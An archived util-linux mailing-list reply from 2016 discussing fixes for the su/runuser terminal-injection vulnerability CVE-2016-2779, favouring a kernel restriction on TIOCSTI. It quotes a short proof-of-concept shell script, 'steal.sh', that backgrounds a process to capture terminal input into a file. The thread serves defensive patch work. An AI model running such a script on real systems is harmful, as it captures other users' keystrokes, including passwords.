From: "Ángel González" <ingenit@zoho.com>
To: Stanislav Brabec <sbrabec@suse.cz>
Cc: util-linux@vger.kernel.org,
Federico Bento <up201407890@alunos.dcc.fc.up.pt>
Subject: Re: Fixing su + runuser vulnerability CVE-2016-2779
Date: Thu, 03 Mar 2016 00:39:48 +0100 [thread overview]
Message-ID: <56D779C4.3050800@zoho.com> (raw)
In-Reply-To: <56D7409A.6050407@suse.cz>
On 02/03/16 20:35, Stanislav Brabec wrote:
> Another possible fixes would be:
>
> - Request redirection of all I/O channels. (I. e. documentation fix
> plus possible command line option to make it simpler.)
>
> - Or create custom pty container (like script does).
>
> - Or create a kernel level fix restricting TIOCSTI and let utilities as
> they are.
>
> First two will have side effects, third seems to be a right way to me.
+1
IMHO a process without CAP_SYS_ADMIN (or similar) shouldn't be able to
fake input¹ into a terminal owned² by a different user.
¹ yes, that's the goal of TIOCSTI)
² Not a complete solution, since you could have:
$ su root su $USER -s ./test_tiocsti
but if you are the owner of the terminal, it could do all kind of nasty
things all the way down anyway.
> Additionally, https://bugzilla.redhat.com/show_bug.cgi?id=173008 says,
> that even it does not handle all possible attacks, because attacker can
> still read and write to the terminal:
>
> ==== steal.sh ====
> #!/bin/sh
> (
> sleep 3
> exec 0>&1
> echo "Hallo">/dev/stdout
> cat>/tmp/nobody-savefile
> )&
> ==================
>
> ~/util-linux # ./runuser -u nobody ./steal.sh
> ~/util-linux # Hallo
Nice use of background process with what is otherwise expected.
The is that the user is tricked into thinking that the child process
[tree] has finished while it hasn't.
However, it doesn't seem work here:
> ./steal.sh: line 5: /dev/stdout: Permission denied
> cat: -: Input/output error
next prev parent reply other threads:[~2016-03-02 23:39 UTC|newest]
Thread overview: 19+ messages / expand[flat|nested] mbox.gz Atom feed top
2016-03-02 19:35 Fixing su + runuser vulnerability CVE-2016-2779 Stanislav Brabec
2016-03-02 23:39 ` Ángel González [this message]
2016-03-03 0:37 ` up201407890
2016-03-03 16:21 ` Stanislav Brabec
2016-03-04 16:13 ` Stanislav Brabec
2016-03-04 18:03 ` up201407890
2016-03-04 23:50 ` Ángel González
2016-03-08 16:33 ` Stanislav Brabec
2016-03-07 13:13 ` Karel Zak
2016-03-08 16:02 ` Stanislav Brabec
2016-09-29 14:40 ` Karel Zak
2016-10-02 13:16 ` Florian Weimer
2016-10-03 10:28 ` Karel Zak
2016-10-03 13:29 ` Karel Zak
2016-10-09 11:09 ` Florian Weimer
2016-10-03 15:04 ` Karel Zak
2016-10-03 15:48 ` Pádraig Brady
2016-10-03 16:25 ` Karel Zak
2016-10-11 14:19 ` Karel Zak
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=56D779C4.3050800@zoho.com \
--to=ingenit@zoho.com \
--cc=sbrabec@suse.cz \
--cc=up201407890@alunos.dcc.fc.up.pt \
--cc=util-linux@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox